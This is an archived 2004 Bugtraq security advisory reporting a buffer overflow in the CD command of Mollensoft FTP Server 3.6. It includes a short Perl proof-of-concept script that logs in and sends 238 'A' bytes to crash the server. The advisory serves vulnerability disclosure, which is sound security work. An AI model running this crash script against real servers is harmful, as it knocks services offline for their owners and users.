lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 28 May 2004 05:38:45 -0000
From: Chintan Trivedi <chesschintan@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Mollensoft ftp Server ver 3.6 Buffer overflow





[ Mollensoft ftp Server ver 3.6 Buffer overflow ]

-----------------------------------------------------
EOS Advisory - http://www.eos-india.net
-----------------------------------------------------


Vendor         : http://www.mollensoft.com
Version	       : 3.6 (latest) 
Vulnerability  : Buffer Overflow


About Product 
=============

	Mollensoft Lightweight FTP Server is a powerful, reliable FTP server for Windows95/98/NT/2000. It includes New Security and Faster, More Efficient Rules Based Access, Live Client activity Window as well as a specific Client breakdown window (below) and significant enhancement in speed/stability and is especially designed for Intranet Use!

(direct quote from website)

Description
===========

	A buffer overflow vulnerability exists in its "CD" command which can lead to READ any memory location. An attacker can pass a string of 238 bytes to the "CD" command to cause this overflow. 

ftp> CD AAAAAAA...(238 times)

The ftpd deamon at this point crashes with an error message saying 

"The instruction at 0x50e0931f referenced memory at 0x41414141. The memory could not be read."

	On debugging the process, the instruction at memory location "0x50E0931F" is found to be "CMP BYTE PTR DS:[ESI], 1F" And the register ESI contains "41414141". So basically the application is trying to READ from 0x41414141. Thus in this manner an attacker can force the application to READ from any memory location. In worst cases if properly exploited the vulnerability can also lead to a remote exploit giving complete access to the vulnerable system. 

Proof Of Concept
================

# C:\Active Perl\perl
# POC for mollensoft ftp server 3.6
# Will crash the deamon

use IO::Socket::INET;

$host = "localhost";
$port = 21;
$buffer = "A" x 238;

$socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);

print $socket "USER root\r\n";
$socket->recv($test,100);
print $test;

print $socket "PASS password\r\n";
$socket->recv($test,100);
print $test;

print $socket "CD $buffer\r\n";
$socket->recv($test,100);
print $test;

close($socket);


Credits
=======

Chintan Trivedi - chesschintan [at] hotmail.com 
http://www.eos-india.net
Eye on Security Research Group - India


Powered by blists - more mailing lists